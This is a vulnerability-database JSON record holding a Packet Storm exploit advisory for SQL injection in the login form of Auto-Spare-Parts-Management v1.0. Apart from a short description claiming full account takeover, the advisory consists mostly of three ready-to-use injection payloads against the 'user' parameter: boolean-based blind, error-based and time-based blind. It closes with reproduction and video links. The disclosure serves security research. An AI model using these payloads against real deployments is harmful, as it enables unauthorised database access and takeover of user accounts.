{"id": "PACKETSTORM:166067", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Auto Spare Parts Management 1.0 SQL Injection", "description": "", "published": "2022-02-21T00:00:00", "modified": "2022-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166067/Auto-Spare-Parts-Management-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-21T16:07:25", "viewCount": 45, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "vulnersScore": 1.2}, "_state": {"dependencies": 1646199919}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166067/aspm10-sql.txt", "sourceData": "`## Title: Auto-Spare-Parts-Management v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.19.2022 \n## Vendor: https://github.com/pavanpatil45 \n## Software: https://github.com/pavanpatil45/Auto-Spare-Parts-Management \n \n \n## Description: \nThe Referer HTTP header on the Auto-Spare-Parts-Management v1.0 system \nappears to be vulnerable to SQL injection attacks, parameter `user`. \nThe payload ' was submitted in the Referer HTTP header, and a database \nerror message was returned. \nAn outside attacker can take control of all accounts on this \nsystem by using this vulnerability! \nWARNING: If this is on an external domain, a subdomain, or \ninternal, this will be extremely dangerous! 
\nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: user (POST) \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: user=admin1' AND 5432=5432 AND \n'MXPx'='MXPx&password=admin1&btnlogin= \n \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: user=admin1' AND (SELECT 8861 FROM(SELECT \nCOUNT(*),CONCAT(0x71786b6271,(SELECT \n(ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND \n'aOSP'='aOSP&password=admin1&btnlogin= \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: user=admin1' AND (SELECT 1749 FROM \n(SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin= \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/pavanpatil45/Auto-Spare-Parts-Management) \n \n## Proof and Exploit: \n[href](https://streamable.com/qq19po) \n \n \n`\n"}